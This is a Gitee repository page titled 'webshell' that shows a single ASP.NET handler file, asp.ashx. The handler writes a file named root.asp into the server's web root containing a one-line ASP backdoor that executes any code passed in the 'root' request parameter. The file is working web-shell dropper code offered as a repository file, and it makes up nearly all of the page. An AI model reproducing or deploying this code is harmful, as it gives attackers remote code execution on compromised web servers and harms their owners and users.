2 Star 2 Fork 4

yvsm/webshell

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
克隆/下载
asp.ashx 491 Bytes
一键复制 编辑 原始数据 按行查看 历史
yvsm 提交于 2016-10-01 20:26 . no commit message
<%@ WebHandler Language="C#" class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
PHP
1
https://gitee.com/zunyunkeji/webshell.git
git@gitee.com:zunyunkeji/webshell.git
zunyunkeji
webshell
webshell
master

搜索帮助